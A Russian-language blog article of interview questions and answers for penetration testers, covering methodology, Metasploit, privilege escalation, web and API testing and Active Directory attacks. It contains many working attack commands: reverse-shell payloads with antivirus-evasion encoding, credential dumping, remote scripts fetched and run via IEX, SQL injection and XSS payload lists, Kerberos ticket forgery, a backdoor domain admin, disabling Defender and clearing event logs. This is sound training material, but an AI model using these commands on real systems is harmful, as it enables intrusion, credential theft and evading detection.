декабря 21, 2025
14 мин. чтения

Вопросы и ответы для собеседования пентестера

interview
career-advice
job-search
Вопросы и ответы для собеседования пентестера
Milad Bonakdar

Milad Bonakdar

Автор

Подготовьтесь к собеседованию пентестера с практическими вопросами о скоупинге, разведке, приоритизации уязвимостей, Burp Suite, Metasploit, API, Active Directory и отчетах.

Введение

Сильный ответ на собеседовании пентестера показывает три вещи: вы работаете в согласованном скоупе, тестируете методично и объясняете риск так, чтобы технические и бизнес-команды могли действовать.

Используйте эти вопросы, чтобы отработать практические части роли: скоупинг, разведку, приоритизацию уязвимостей, Burp Suite, Metasploit, тестирование API, Active Directory и отчеты. Держите ответы в рамках авторизованного тестирования, доказательств и рекомендаций по исправлению.

Основы тестирования на проникновение

1. Каковы этапы тестирования на проникновение?

Ответ: Хорошая методология начинается до сканирования. Сначала подтвердите письменное разрешение, скоуп, правила взаимодействия, окна тестирования, ограничения по данным и экстренные контакты. Затем двигайтесь повторяемым процессом:

1. Скоупинг и планирование:

  • Подтвердить письменное разрешение, цели, исключения и правила взаимодействия
  • Определить цели, критерии успеха, каналы связи и условия остановки

2. Разведка и обнаружение:

  • Собрать пассивную и активную информацию
  • Найти хосты, сервисы, потоки приложения, роли пользователей и открытую поверхность атаки

3. Анализ уязвимостей:

  • Связать находки с бизнес-влиянием и эксплуатируемостью
  • Вручную подтвердить результаты сканера перед оформлением finding

4. Эксплуатация и пост-эксплуатация:

  • Эксплуатировать только уязвимости в скоупе, необходимые для доказательства влияния
  • Проверять границы привилегий, пути lateral movement и экспозицию данных, не выходя за правила

5. Отчет, очистка и ретест:

  • Документировать доказательства, влияние, шаги воспроизведения и исправление
  • Удалить тестовые артефакты, провести debrief и ретестировать исправления по запросу
Loading diagram...

Пример разведки:

# Пассивная разведка
whois target.com
nslookup target.com
dig target.com ANY

# Активная разведка
nmap -sn 192.168.1.0/24  # Обнаружение хостов
nmap -sV -sC target.com  # Обнаружение сервисов/версий

Распространенность: Очень часто
Сложность: Средняя

Оценка уязвимостей

2. Как вы расставляете приоритеты для уязвимостей?

Ответ: Используйте CVSS как отправную точку, а затем учитывайте эксплуатируемость, критичность актива, чувствительность данных, экспозицию, компенсирующие меры и известную активную эксплуатацию. На собеседовании важно показать, что вы не считаете все результаты сканера одинаково срочными.

Оценка CVSS:

  • Критическая (9.0-10.0): Удаленное выполнение кода, обход аутентификации
  • Высокая (7.0-8.9): SQL-инъекция, XSS с доступом к данным
  • Средняя (4.0-6.9): Раскрытие информации, CSRF
  • Низкая (0.1-3.9): Незначительная утечка информации

Факторы приоритизации:

def calculate_risk_score(vulnerability):
    """Вычисление оценки риска для уязвимости"""
    # Базовая оценка CVSS
    cvss_score = vulnerability.cvss_score
    
    # Эксплуатируемость
    if vulnerability.exploit_available:
        exploitability = 1.5
    elif vulnerability.poc_available:
        exploitability = 1.2
    else:
        exploitability = 1.0
    
    # Критичность актива
    asset_value = {
        'critical': 3.0,  # Продуктивная база данных
        'high': 2.0,      # Веб-приложение
        'medium': 1.5,    # Внутренний инструмент
        'low': 1.0        # Тестовая среда
    }[vulnerability.asset_criticality]
    
    # Чувствительность данных
    data_sensitivity = {
        'pii': 2.0,       # Персональные данные
        'financial': 2.5, # Платежная информация
        'confidential': 1.5,
        'public': 1.0
    }[vulnerability.data_type]
    
    risk_score = cvss_score * exploitability * asset_value * data_sensitivity
    return min(risk_score, 10.0)  # Ограничение до 10

Распространенность: Очень часто
Сложность: Средняя

Metasploit

3. Как вы используете Metasploit для эксплуатации уязвимости?

Ответ: Рабочий процесс Metasploit Framework:

Базовая эксплуатация:

# Запуск Metasploit
msfconsole

# Поиск эксплойта
search ms17-010  # EternalBlue

# Использование эксплойта
use exploit/windows/smb/ms17_010_eternalblue

# Показ опций
show options

# Установка цели
set RHOSTS 192.168.1.100

# Установка полезной нагрузки
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444

# Проверка, является ли цель уязвимой
check

# Запуск эксплойта
exploit

Команды Meterpreter:

# Информация о системе
sysinfo
getuid

# Повышение привилегий
getsystem

# Сброс учетных данных
hashdump
load kiwi
cred_all

# Сохранение доступа
run persistence -X -i 60 -p 4444 -r 192.168.1.50

# Pivoting
run autoroute -s 10.0.0.0/24
portfwd add -l 3389 -p 3389 -r 10.0.0.10

Генерация полезной нагрузки:

# Генерация обратной оболочки
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -f exe -o payload.exe

# Кодирование для обхода AV
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 \
  -f exe -o encoded_payload.exe

Распространенность: Очень часто
Сложность: Средне-сложная

4. Как вы выполняете повышение привилегий?

Ответ: Повышение привилегий эксплуатирует неправильные конфигурации для получения более высоких уровней доступа.

Повышение привилегий в Linux:

1. Перечисление:

# Информация о системе
uname -a
cat /etc/issue
cat /etc/*-release

# Текущий пользователь и привилегии
id
sudo -l

# Пользователи и группы
cat /etc/passwd
cat /etc/group

# SUID бинарники
find / -perm -4000 -type f 2>/dev/null

# Доступные для записи каталоги
find / -writable -type d 2>/dev/null

# Задания cron
crontab -l
cat /etc/crontab
ls -la /etc/cron*

# Сетевые соединения
netstat -antup
ss -tulpn

2. Общие методы:

Эксплуатация SUID:

# Поиск SUID бинарников
find / -perm -u=s -type f 2>/dev/null

# Пример: Эксплуатация find
find /home -exec /bin/sh \; -quit

# Пример: Эксплуатация vim
vim -c ':!/bin/sh'

# Пример: Эксплуатация nmap (старые версии)
nmap --interactive
nmap> !sh

Неправильная конфигурация Sudo:

# Проверка разрешений sudo
sudo -l

# Пример вывода:
# (ALL) NOPASSWD: /usr/bin/vim

# Эксплуатация vim
sudo vim -c ':!/bin/sh'

# Пример: LD_PRELOAD
sudo LD_PRELOAD=/tmp/shell.so find

Эксплойты ядра:

# Проверка версии ядра
uname -r

# Поиск эксплойтов
searchsploit linux kernel 4.4.0

# Пример: Dirty COW
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password

3. Автоматизированные инструменты:

# LinPEAS (Linux Privilege Escalation Awesome Script)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

# Linux Exploit Suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Повышение привилегий в Windows:

1. Перечисление:

# Информация о системе
systeminfo
hostname
whoami /all

# Пользователи и группы
net user
net localgroup administrators

# Запущенные процессы
tasklist /v
wmic process list full

# Сервисы
sc query
wmic service list brief

# Запланированные задачи
schtasks /query /fo LIST /v

# Сетевые соединения
netstat -ano

# Установленное программное обеспечение
wmic product get name,version

2. Общие методы:

Неэкранированные пути к службам:

# Поиск неэкранированных путей к службам
wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# Эксплуатация
C:\Program Files\Vulnerable App\service.exe
# Создание вредоносного исполняемого файла по адресу:
C:\Program.exe

AlwaysInstallElevated:

# Проверка реестра
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Если оба равны 1, создание вредоносного MSI
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi
msiexec /quiet /qn /i shell.msi

Имитация токена:

# Meterpreter
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

3. Автоматизированные инструменты:

# WinPEAS
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
Invoke-WinPEAS

# PowerUp
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

# Sherlock (Эксплойты ядра)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Find-AllVulns

Распространенность: Очень часто
Сложность: Сложная

Burp Suite

5. Как вы находите SQL-инъекции с помощью Burp Suite?

Ответ: Систематическое тестирование на SQL-инъекции:

1. Перехват запроса:

POST /login HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=test123

2. Отправка в Repeater: Тестирование ручных полезных нагрузок:

username=admin' OR '1'='1&password=test
username=admin' AND 1=1--&password=test
username=admin' UNION SELECT NULL--&password=test

3. Использование Intruder:

Attack Type: Sniper
Payload Position: username=§admin§
Payload List:
  ' OR '1'='1
  ' OR 1=1--
  ' UNION SELECT NULL--
  ' UNION SELECT NULL,NULL--
  admin'--
  ' OR 'a'='a

4. Анализ ответов:

  • Различная длина ответов
  • Сообщения об ошибках
  • Задержки по времени (слепая SQLi)

Расширенное тестирование:

# Обнаружение слепой SQL-инъекции
import requests
import time

def test_blind_sqli(url, param):
    # Обнаружение на основе времени
    payloads = [
        "' AND SLEEP(5)--",
        "' OR SLEEP(5)--",
        "'; WAITFOR DELAY '00:00:05'--"
    ]
    
    for payload in payloads:
        start = time.time()
        response = requests.post(url, data={param: payload})
        elapsed = time.time() - start
        
        if elapsed > 5:
            print(f"[+] Слепая SQLi обнаружена с полезной нагрузкой: {payload}")
            return True
    
    return False

Распространенность: Очень часто
Сложность: Средняя

Тестирование веб-приложений

6. Как вы тестируете на XSS-уязвимости?

Ответ: Комплексный подход к тестированию XSS:

Типы XSS:

  1. Отраженные: Полезная нагрузка в URL/форме, отражается немедленно
  2. Хранимые: Полезная нагрузка хранится в базе данных
  3. DOM-based: Уязвимость JavaScript на стороне клиента

Методология тестирования:

1. Определение точек инъекции:

# Параметры URL
http://target.com/search?q=<script>alert(1)</script>

# Входы формы
<input name="comment" value="<script>alert(1)</script>">

# HTTP-заголовки
User-Agent: <script>alert(1)</script>

2. Обход фильтров:

// Базовые полезные нагрузки
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

// Обход фильтров
<scr<script>ipt>alert(1)</script>
<img src=x onerror="alert(1)">
<IMG SRC=x ONERROR=alert(1)>  // Изменение регистра

// Обработчики событий
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>

// Закодированные полезные нагрузки
&#60;script&#62;alert(1)&#60;/script&#62;
\u003cscript\u003ealert(1)\u003c/script\u003e

3. Тестирование XSS в Burp Suite:

Intruder Payload List:
  <script>alert(document.domain)</script>
  <img src=x onerror=alert(1)>
  <svg/onload=alert(1)>
  javascript:alert(1)
  <iframe src="javascript:alert(1)">

4. Автоматизированное сканирование:

# XSStrike
python xsstrike.py -u "http://target.com/search?q=test"

# Dalfox
dalfox url http://target.com/search?q=FUZZ

Распространенность: Очень часто
Сложность: Средняя

7. Как вы тестируете безопасность API?

Ответ: Тестирование безопасности API фокусируется на аутентификации, авторизации и проверке ввода.

Общие уязвимости API:

1. Некорректная аутентификация:

# Тестирование слабого JWT
curl -H "Authorization: Bearer eyJhbGciOiJub25lIn0..." https://api.example.com/user

# JWT с "alg": "none"
# Изменение полезной нагрузки и удаление подписи

2. Некорректная авторизация:

# IDOR (Insecure Direct Object Reference)
curl https://api.example.com/user/123
curl https://api.example.com/user/124  # Попробуйте другие идентификаторы пользователей

# Тестирование различных HTTP-методов
curl -X DELETE https://api.example.com/user/123
curl -X PUT https://api.example.com/user/123 -d '{"role":"admin"}'

3. Массовое назначение:

# Попытка добавления полей администратора
curl -X POST https://api.example.com/register \
  -H "Content-Type: application/json" \
  -d '{
    "username": "attacker",
    "password": "pass123",
    "role": "admin",
    "is_admin": true
  }'

Тестирование REST API:

# Автоматизированное тестирование API
import requests
import json

class APISecurityTester:
    def __init__(self, base_url, token=None):
        self.base_url = base_url
        self.headers = {}
        if token:
            self.headers['Authorization'] = f'Bearer {token}'
    
    def test_idor(self, endpoint, id_range):
        """Тестирование на IDOR-уязвимости"""
        accessible_ids = []
        
        for user_id in range(id_range[0], id_range[1]):
            url = f"{self.base_url}/{endpoint}/{user_id}"
            response = requests.get(url, headers=self.headers)
            
            if response.status_code == 200:
                accessible_ids.append(user_id)
                print(f"[+] Доступно: {user_id}")
        
        return accessible_ids
    
    def test_rate_limiting(self, endpoint):
        """Тестирование ограничения скорости"""
        for i in range(1000):
            response = requests.get(
                f"{self.base_url}/{endpoint}",
                headers=self.headers
            )
            
            if response.status_code == 429:
                print(f"[+] Ограничение скорости применено после {i} запросов")
                return True
        
        print("[-] Ограничение скорости не обнаружено")
        return False
    
    def test_injection(self, endpoint, payloads):
        """Тестирование на инъекционные уязвимости"""
        for payload in payloads:
            data = {"search": payload}
            response = requests.post(
                f"{self.base_url}/{endpoint}",
                headers=self.headers,
                json=data
            )
            
            # Проверка на SQL-ошибки
            if any(err in response.text.lower() for err in 
                   ['sql', 'mysql', 'sqlite', 'postgresql', 'oracle']):
                print(f"[!] Потенциальная SQL-инъекция: {payload}")
                print(f"Ответ: {response.text[:200]}")
    
    def test_authentication_bypass(self, login_endpoint):
        """Тестирование обхода аутентификации"""
        bypass_payloads = [
            {"username": "admin' OR '1'='1", "password": "anything"},
            {"username": "admin", "password": "' OR '1'='1"},
            {"username": "admin'--", "password": ""},
        ]
        
        for payload in bypass_payloads:
            response = requests.post(
                f"{self.base_url}/{login_endpoint}",
                json=payload
            )
            
            if response.status_code == 200:
                print(f"[!] Потенциальный обход аутентификации: {payload}")

# Использование
tester = APISecurityTester('https://api.example.com')
tester.test_idor('users', (1, 100))
tester.test_rate_limiting('api/search')

Тестирование GraphQL:

# Запрос интроспекции
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields {
        name
        args {
          name
          type { name }
        }
      }
    }
  }
}
# GraphQL-инъекция
query = '''
query {
  user(id: "1' OR '1'='1") {
    id
    username
    email
  }
}
'''

# Атака с пакетной обработкой GraphQL
queries = [
    {"query": "query { user(id: 1) { id username } }"},
    {"query": "query { user(id: 2) { id username } }"},
    # ... повторить 1000 раз
]

response = requests.post(
    'https://api.example.com/graphql',
    json=queries
)

Фаззинг API:

# Использование ffuf для фаззинга API
ffuf -w wordlist.txt -u https://api.example.com/FUZZ -mc 200,301,302

# Фаззинг параметров
ffuf -w params.txt -u https://api.example.com/api?FUZZ=test -mc 200

# Фаззинг методов
for method in GET POST PUT DELETE PATCH OPTIONS; do
    curl -X $method https://api.example.com/api/resource
done

Postman/Burp Suite:

// Скрипт предварительного запроса Postman
const payload = "' OR '1'='1";
pm.environment.set("injection_payload", payload);

// Скрипт тестирования Postman
pm.test("Проверка на SQL-ошибку", function () {
    pm.expect(pm.response.text()).to.not.include("SQL");
    pm.expect(pm.response.text()).to.not.include("mysql");
});

OWASP API Security Top 10:

  1. Некорректная авторизация на уровне объектов - Тестирование IDOR
  2. Некорректная аутентификация - Тестирование слабых токенов
  3. Чрезмерное раскрытие данных - Проверка данных ответа
  4. Недостаток ресурсов и ограничение скорости - Тестирование DoS
  5. Некорректная авторизация на уровне функций - Тестирование повышения привилегий
  6. Массовое назначение - Тестирование загрязнения параметров
  7. Неправильная конфигурация безопасности - Проверка заголовков, CORS
  8. Инъекция - Тестирование SQLi, NoSQLi, командной инъекции
  9. Неправильное управление активами - Поиск старых версий API
  10. Недостаточное ведение журналов и мониторинг - Проверка журналов аудита

Распространенность: Часто
Сложность: Средне-сложная

Сетевое тестирование на проникновение

8. Как вы выполняете сетевое тестирование на проникновение?

Ответ: Структурированная оценка сети:

1. Обнаружение сети:

# Ping-сканирование
nmap -sn 192.168.1.0/24

# ARP-сканирование (локальная сеть)
arp-scan -l

# Выявление активных хостов
netdiscover -r 192.168.1.0/24

2. Сканирование портов:

# TCP SYN-сканирование (скрытое)
nmap -sS 192.168.1.100

# Обнаружение версии сервиса
nmap -sV 192.168.1.100

# Обнаружение ОС
nmap -O 192.168.1.100

# Агрессивное сканирование
nmap -A -T4 192.168.1.100

# Все порты
nmap -p- 192.168.1.100

3. Сканирование на уязвимости:

# Скрипты Nmap NSE
nmap --script vuln 192.168.1.100

# Конкретная уязвимость
nmap --script smb-vuln-ms17-010 192.168.1.100

# OpenVAS/Nessus для комплексного сканирования

4. Эксплуатация:

# Эксплуатация SMB
use exploit/windows/smb/ms17_010_eternalblue

# Перебор SSH
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run

5. Пост-эксплуатация:

# Горизонтальное перемещение
# Сброс учетных данных
# Повышение привилегий
# Сохранение доступа

Распространенность: Очень часто
Сложность: Сложная

9. Как вы атакуете среды Active Directory?

Ответ: Active Directory является основной целью с множеством векторов атак.

Перечисление:

# Перечисление PowerView
Import-Module PowerView.ps1

# Получение информации о домене
Get-Domain
Get-DomainController

# Перечисление пользователей
Get-DomainUser
Get-DomainUser -Identity administrator

# Перечисление групп
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"

# Поиск общих ресурсов
Find-DomainShare -CheckShareAccess

# Поиск компьютеров
Get-DomainComputer

BloodHound:

# Сбор данных с помощью SharpHound
.\SharpHound.exe -c All

# Или с помощью PowerShell
Import-Module SharpHound.ps1
Invoke-BloodHound -CollectionMethod All

# Загрузка JSON в графический интерфейс BloodHound
# Анализ путей атаки на Domain Admins

Kerberoasting:

# Запрос сервисных билетов
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

# Или с помощью Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Взлом с помощью hashcat
hashcat -m 13100 hashes.txt wordlist.txt

AS-REP Roasting:

# Поиск пользователей с "Do not require Kerberos preauthentication"
Get-DomainUser -PreauthNotRequired

# Запрос AS-REP
.\Rubeus.exe asreproast /outfile:asrep_hashes.txt

# Взлом
hashcat -m 18200 asrep_hashes.txt wordlist.txt

Pass-the-Hash:

# Использование Impacket
python3 psexec.py -hashes :ntlmhash [email protected]

# Использование CrackMapExec
crackmapexec smb 10.10.10.0/24 -u administrator -H ntlmhash

# Дамп SAM
python3 secretsdump.py -hashes :ntlmhash [email protected]

Pass-the-Ticket:

# Экспорт билетов с помощью Mimikatz
mimikatz # sekurlsa::tickets /export

# Инъекция билета
mimikatz # kerberos::ptt ticket.kirbi

# Или с помощью Rubeus
.\Rubeus.exe ptt /ticket:ticket.kirbi

Golden Ticket:

# Получение krbtgt hash
mimikatz # lsadump::dcsync /domain:example.com /user:krbtgt

# Создание golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:hash /id:500

# Инъекция билета
mimikatz # kerberos::ptt ticket.kirbi

Silver Ticket:

# Получение хеша учетной записи службы
mimikatz # sekurlsa::logonpasswords

# Создание silver ticket для конкретного сервиса
mimikatz # kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /target:server.example.com /service:cifs /rc4:hash

DCSync Attack:

# Mimikatz
mimikatz # lsadump::dcsync /domain:example.com /user:Administrator

# Impacket
python3 secretsdump.py example.com/user:[email protected]

Горизонтальное перемещение:

# PSExec
.\PsExec.exe \\target -u domain\user -p password cmd

# WMI
wmic /node:target /user:domain\user /password:password process call create "cmd.exe"

# PowerShell Remoting
Enter-PSSession -ComputerName target -Credential domain\user

# RDP
xfreerdp /u:domain\user /p:password /v:target

Сохранение доступа:

# Создание администратора домена
net user backdoor Password123! /add /domain
net group "Domain Admins" backdoor /add /domain

# Golden ticket (долгосрочный)
# Silver ticket (конкретный сервис)

# Skeleton key (Mimikatz)
mimikatz # misc::skeleton
# Теперь любой пользователь может аутентифицироваться с паролем "mimikatz"

Обход защиты:

# Отключение Защитника Windows
Set-MpPreference -DisableRealtimeMonitoring $true

# Очистка журналов событий
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Обфускация PowerShell
Invoke-Obfuscation

Распространенность: Часто
Сложность: Сложная

Отчетность

10. Что должен включать в себя отчет о тестировании на проникновение?

Ответ: Комплексная структура отчетности:

Исполнительное резюме:

  • Основные результаты
  • Влияние на бизнес
  • Обзор рисков
  • Рекомендации

Технические детали:

Пример finding: SQL-инъекция в форме входа

Серьезность: Критическая (CVSS 9.8)

Описание: Форма входа по адресу /admin/login уязвима к SQL-инъекции, позволяя злоумышленникам обходить аутентификацию и получать доступ к панели администратора.

Затронутый актив:

Подтверждение концепции:

POST /admin/login HTTP/1.1
Host: target.com

username=admin' OR '1'='1'--&password=anything

Влияние:

  • Несанкционированный доступ к панели администратора
  • Доступ к конфиденциальным данным клиентов
  • Потенциальный компрометация базы данных

Устранение:

  1. Использование параметризованных запросов
  2. Реализация проверки ввода
  3. Применение принципа наименьших привилегий к пользователю базы данных

Распространенность: Очень часто
Сложность: Средняя

Заключение

Собеседования с специалистами по тестированию на проникновение требуют практического опыта и глубоких технических знаний. Сосредоточьтесь на:

  1. Методологии: Структурированный подход к тестированию, документация
  2. Оценке уязвимостей: Приоритизация рисков, оценка CVSS
  3. Инструментах: Metasploit, Burp Suite, Nmap, пользовательские скрипты
  4. Повышении привилегий: Техники Linux и Windows, инструменты автоматизации
  5. Веб-тестировании: SQL-инъекция, XSS, обход аутентификации
  6. Тестировании API: Безопасность REST/GraphQL, недостатки авторизации
  7. Сетевом тестировании: Сканирование, эксплуатация, горизонтальное перемещение
  8. Active Directory: Kerberoasting, Pass-the-Hash, BloodHound
  9. Отчетности: Четкая документация, влияние на бизнес, устранение

Практикуйтесь в легальных лабораториях и специально уязвимых приложениях, соберите повторяемый чеклист тестирования и тренируйте описание findings так же серьезно, как эксплуатацию. Сильные кандидаты объясняют, когда остановиться, как безопасно доказать влияние и как помочь команде исправить проблему.

Newsletter subscription

Еженедельные советы по карьере, которые действительно работают

Получайте последние идеи прямо на вашу почту

Похожие посты

Вопросы для собеседования Senior Data Scientist: ML, продукт и MLOps
дек. 21, 2025
14 мин. чтения

Вопросы для собеседования Senior Data Scientist: ML, продукт и MLOps

Подготовьтесь к senior-собеседованию с практическими вопросами о ML-компромиссах, разработке признаков, развертывании, мониторинге, A/B-тестах и бизнес-решениях.

Milad BonakdarMilad Bonakdar
Вопросы для собеседования Lead Data Scientist
дек. 21, 2025
14 мин. чтения

Вопросы для собеседования Lead Data Scientist

Подготовьтесь к собеседованию Lead Data Scientist: вопросы о лидерстве, ML-роадмапах, моделях в продакшене, работе со стейкхолдерами и ответственной ИИ.

Milad BonakdarMilad Bonakdar
Вопросы для собеседования Go backend-разработчика
дек. 21, 2025
10 мин. чтения

Вопросы для собеседования Go backend-разработчика

Подготовьтесь к Go backend-собеседованию с вопросами о goroutine, channel, context, обработке ошибок, тестах, HTTP-серверах и системном дизайне.

Milad BonakdarMilad Bonakdar

Создайте резюме, которое поможет вам устроиться на 60% быстрее

За несколько минут создайте персонализированное резюме, совместимое с ATS, которое доказано увеличивает количество собеседований в 6 раз.

Создать лучшее резюме

Поделиться этим постом

Сократите Время Написания Резюме на 90%

Средний соискатель тратит более 3 часов на форматирование резюме. Наш ИИ делает это менее чем за 15 минут, ускоряя переход к этапу подачи заявки в 12 раз.

Создать за 15 Минут